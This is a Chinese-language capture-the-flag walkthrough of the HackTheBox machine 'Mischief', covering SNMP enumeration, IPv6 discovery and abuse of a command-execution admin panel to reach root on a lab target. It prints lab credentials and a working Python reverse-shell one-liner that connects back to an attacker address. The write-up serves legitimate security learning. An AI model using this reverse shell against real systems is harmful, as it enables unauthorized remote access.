**
HackTheBox-Linux-Mischief-Walkthrough
**
靶機地址:https://www.hackthebox.eu/home/machines/profile/145
靶機難度:瘋狂(5.0/10)
靶機發布日期:2019年1月3日
靶機描述:
Mischief is hard to insane difficulty machine that highlights the risks involved with exposing SNMP, and the dangers of passing credentials over the command line. It also features a “ping” admin page - functionality often found on appliances, which is worth testing for RCE vulnerabilities.
作者:大餘
時間:2020-06-11
請注意:對於所有這些計算機,我是通過平臺授權允許情況進行滲透的。我將使用Kali Linux作爲解決該HTB的攻擊者機器。這裏使用的技術僅用於學習教育目的,如果列出的技術用於其他任何目標,我概不負責。
一、信息收集
可以看到靶機的IP是10.10.10.92…
Nmap發現開放了SSH(需要基本身份驗證的Python Web服務器)和SNMP…
可以看到本地開放了3366和UDP有關…
看到登錄憑據被用作連接端口3366進行身份驗證…獲得登錄賬號密碼…
直接訪問3366頁面,利用憑證成功登錄…又獲得了兩組密碼…
對於snmp以前HTB靶機也遇到過,存在snmp一般在ipv6上也開放了相對應的端口…
命令:git clone https://github.com/trickster0/Enyx.git
利用Enyx腳本獲取靶機的ipv6信息…
通過nmap掃描發現了ssh和80端口都開放着…
通過IPv6成功訪問頁面…
這是個登陸頁面…從前面獲取的兩組密碼…進行嘗試…
通過administrator/trickeryanddeceit成功進入…
可以看到這是命令執行的面板REC,可以運行任意系統命令…利用python簡單shell提權…
可以看到,這裏使用 IP無法提權…
命令:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1031",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
需要IPV6進行,獲得了反向外殼…
無法獲得user_flag信息…但是在loki目錄下讀取到了passwd密碼信息…
嘗試ssh登陸,成功登陸…獲得了user_flag信息…
直接枚舉目錄底層信息…查看第一個文件就發現了loki又一組密碼信息…
可以看到loki用戶沒有執行切換用戶命令的權限…
回到前面的www權限,優化TTY後,su獲得了root權限…但是還是無法讀取root_flag…
提示root_flag不在此處…說明root沒加密流,繼續在別的地方找找…
獲得了root_flag信息…
這臺靶機說難,其實感覺很中規中矩…作者給了Insane難度評價…瘋狂…
可能大多數人會在TCP坑裏停留很久…
針對HTB的5.0難度靶機,推薦UDP也順帶nmap…
我前面做了兩臺類似的snmp_udp的靶機…然後利用ipv6提權的…所以可能比較輕鬆…
獲得www提權後,如果加點加密流阻礙,在弄個緩衝區溢出提權…才能對得起Insane難度評價把…
給個評價難度高級…哈哈哈…加油
由於我們已經成功得到root權限查看user和root.txt,因此完成這臺高級的靶機,希望你們喜歡這臺機器,請繼續關注大餘後期會有更多具有挑戰性的機器,一起練習學習。
如果你有其他的方法,歡迎留言。要是有寫錯了的地方,請你一定要告訴我。要是你覺得這篇博客寫的還不錯,歡迎分享給身邊的人。